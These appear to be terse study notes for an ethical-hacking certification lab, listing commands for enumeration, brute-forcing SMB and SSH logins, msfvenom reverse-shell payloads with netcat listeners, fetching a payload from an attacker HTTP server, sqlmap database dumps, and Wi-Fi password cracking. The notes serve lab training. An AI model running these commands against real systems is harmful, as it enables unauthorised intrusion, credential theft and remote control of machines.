1 . nmap -p 389 -sV 10.10.1.22 (10\0\20348)
2. i. ldapsearch -h 10.10.1.22 -x -s base namingcontexts
    II .ldapsearch -x -h 10.10.1.22 -b "DC=CEH,DC=com"
3(7) nmap -p 25,110,143 -sV <Target IP> 
SMTP (Mail Transport): Port 25
IMAP: Port 143
POP3: Port 110

snow -C -p "password" res.txt

python -m SimpleHTTPServer 9000
python3 -m http.server 9000
wget http://10.10.1.13:9000/winPEASx64.exe -o winpeas.exe
SMB -->
sudo nmap -T4 -Ss -p 139,445 - -script vuln 192.166.0.0/24
hydra-l henry -P /home/passlist.txt 192.168.0.1 smb
smbclient -L 192.168.0.1
smbclient //192.168.0.1/share
type password and ls
get sni.txt ~/Desktop/falg2.txt or more sni.txt
cat falg2.txt

Remort login -->
nmap -p 22,23,80,3389 192.168.0.0/24
hydra -L /path/to/user.txt -P /path/to/pass.txt 192.168.0.1 telnet/ssh
telnet 192.168.0.1

msfvenom -p cmd/unix/reverse_netcat LHOST=<your_ip> LPORT=444
nc -lnvp 444

msfvenom -p windows/shell_reverse_tcp lhost=10.10.1.13 lport=8888 -f exe >/root/ADtools/file.exe
move file.exe file.bak ;wget http://10.10.1.13:8000/file.exe -o file.exe
nc -nvlp 8888 
find / -name find.txt 2>/dev/null

ssh <username>@192.168.0.1

https://georgeom.net/StegOnline/upload

njRAT -5552
theef -6703

tcp.flags.syn == 1 and tcp.flags.ack == 0 

sql-> with session
sqlmap -u <"url"> --cookie=<"cookie"> --dbs
sqlmap -u <"url"> --cookie=<"cookie"> -D <database name> --tables
sqlmap -u <"url"> --cookie=<"cookie"> -D <database name> -T <table name> --dump

hashes.com

aircrack-ng wap1crack.cap
aircrack-ng wap2crack.cap -w password.txt
Aircrack-ng Crack the wireless encryption and identify the Wi-Fi password 
1st tentative:aircrack-ng pcapfile (usually works only for WEP encryption) 
2nd tentative: aircrack-ng -w passwordlist pcapfile 
3rd tentative: adding BSSID (-b flag): aircrack-ng -b BSSID -w passwordlist pcapfile (To find BSSID: on Wireshark click on packet, search BSSID and copy value) 


filter as mqtt and see the public message and then go to down panel open and see the message.
